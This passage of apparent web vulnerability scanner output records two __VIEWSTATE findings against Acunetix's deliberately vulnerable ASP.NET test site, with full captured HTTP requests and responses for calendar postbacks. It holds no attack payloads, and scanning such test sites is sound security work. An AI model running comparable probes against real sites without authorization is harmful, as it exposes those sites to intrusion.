href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8554&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAbXnFY9sIZGRkOrJ2mI4SDLheMgc4LlRbUuzBVaM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKJ9YLADAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMEIwEJpx6OJCvPyh8KwQJVN52WFE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:55 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAbXnFY9sIZGRkOrJ2mI4SDLheMgc4LlRbUuzBVaM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKJ9YLADAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMEIwEJpx6OJCvPyh8KwQJVN52WFE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:White" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8558&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAFCPqZtsIZGRkF4QWtnSsQXWuZa9AnjsnPeDe%2FpU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKU%2F5nYDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMm35%2FbsiiMpdJ5k60SYhesgUnHAc%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:22:36 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgDAFCPqZtsIZGRkF4QWtnSsQXWuZa9AnjsnPeDe/pU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKU/5nYDQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMm35/bsiiMpdJ5k60SYhesgUnHAc=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:White" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" 